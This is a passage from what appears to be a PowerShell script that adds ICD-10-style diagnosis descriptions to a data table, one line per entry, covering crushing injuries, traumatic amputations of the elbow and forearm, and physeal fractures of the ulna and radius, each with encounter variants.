elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right elbow","Crushing injury of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right elbow","Crushing injury of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left elbow","Crushing injury of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left elbow","Crushing injury of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left elbow","Crushing injury of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified forearm","Crushing injury of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified forearm","Crushing injury of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified forearm","Crushing injury of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right forearm","Crushing injury of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right forearm","Crushing injury of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right forearm","Crushing injury of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left forearm","Crushing injury of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left forearm","Crushing injury of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left forearm","Crushing injury of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, right arm","Complete traumatic amputation at elbow level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, right arm","Complete traumatic amputation at elbow level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, right arm","Complete traumatic amputation at elbow level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, left arm","Complete traumatic amputation at elbow level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, left arm","Complete traumatic amputation at elbow level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, left arm","Complete traumatic amputation at elbow level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, unspecified arm","Complete traumatic amputation at elbow level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, unspecified arm","Complete traumatic amputation at elbow level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at elbow level, unspecified arm","Complete traumatic amputation at elbow level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, right arm","Partial traumatic amputation at elbow level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, right arm","Partial traumatic amputation at elbow level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, right arm","Partial traumatic amputation at elbow level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, left arm","Partial traumatic amputation at elbow level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, left arm","Partial traumatic amputation at elbow level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, left arm","Partial traumatic amputation at elbow level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, unspecified arm","Partial traumatic amputation at elbow level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, unspecified arm","Partial traumatic amputation at elbow level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at elbow level, unspecified arm","Partial traumatic amputation at elbow level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, right arm","Complete traumatic amputation at level between elbow and wrist, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, right arm","Complete traumatic amputation at level between elbow and wrist, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, right arm","Complete traumatic amputation at level between elbow and wrist, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, left arm","Complete traumatic amputation at level between elbow and wrist, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, left arm","Complete traumatic amputation at level between elbow and wrist, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, left arm","Complete traumatic amputation at level between elbow and wrist, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, unspecified arm","Complete traumatic amputation at level between elbow and wrist, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, unspecified arm","Complete traumatic amputation at level between elbow and wrist, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between elbow and wrist, unspecified arm","Complete traumatic amputation at level between elbow and wrist, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, right arm","Partial traumatic amputation at level between elbow and wrist, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, right arm","Partial traumatic amputation at level between elbow and wrist, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, right arm","Partial traumatic amputation at level between elbow and wrist, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, left arm","Partial traumatic amputation at level between elbow and wrist, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, left arm","Partial traumatic amputation at level between elbow and wrist, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, left arm","Partial traumatic amputation at level between elbow and wrist, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, unspecified arm","Partial traumatic amputation at level between elbow and wrist, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, unspecified arm","Partial traumatic amputation at level between elbow and wrist, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between elbow and wrist, unspecified arm","Partial traumatic amputation at level between elbow and wrist, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right forearm, level unspecified","Complete traumatic amputation of right forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right forearm, level unspecified","Complete traumatic amputation of right forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right forearm, level unspecified","Complete traumatic amputation of right forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left forearm, level unspecified","Complete traumatic amputation of left forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left forearm, level unspecified","Complete traumatic amputation of left forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left forearm, level unspecified","Complete traumatic amputation of left forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified forearm, level unspecified","Complete traumatic amputation of unspecified forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified forearm, level unspecified","Complete traumatic amputation of unspecified forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified forearm, level unspecified","Complete traumatic amputation of unspecified forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right forearm, level unspecified","Partial traumatic amputation of right forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right forearm, level unspecified","Partial traumatic amputation of right forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right forearm, level unspecified","Partial traumatic amputation of right forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left forearm, level unspecified","Partial traumatic amputation of left forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left forearm, level unspecified","Partial traumatic amputation of left forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left forearm, level unspecified","Partial traumatic amputation of left forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified forearm, level unspecified","Partial traumatic amputation of unspecified forearm, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified forearm, level unspecified","Partial traumatic amputation of unspecified forearm, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified forearm, level unspecified","Partial traumatic amputation of unspecified forearm, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, right arm","Unspecified physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, left arm","Unspecified physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of ulna, unspecified arm","Unspecified physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, right arm","Salter-Harris Type I physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, left arm","Salter-Harris Type I physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type I physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, right arm","Salter-Harris Type II physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, left arm","Salter-Harris Type II physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type II physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, right arm","Salter-Harris Type III physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, left arm","Salter-Harris Type III physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type III physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, right arm","Salter-Harris Type IV physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, left arm","Salter-Harris Type IV physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm","Salter-Harris Type IV physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, right arm","Other physeal fracture of lower end of ulna, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, left arm","Other physeal fracture of lower end of ulna, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of ulna, unspecified arm","Other physeal fracture of lower end of ulna, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, right arm","Unspecified physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, 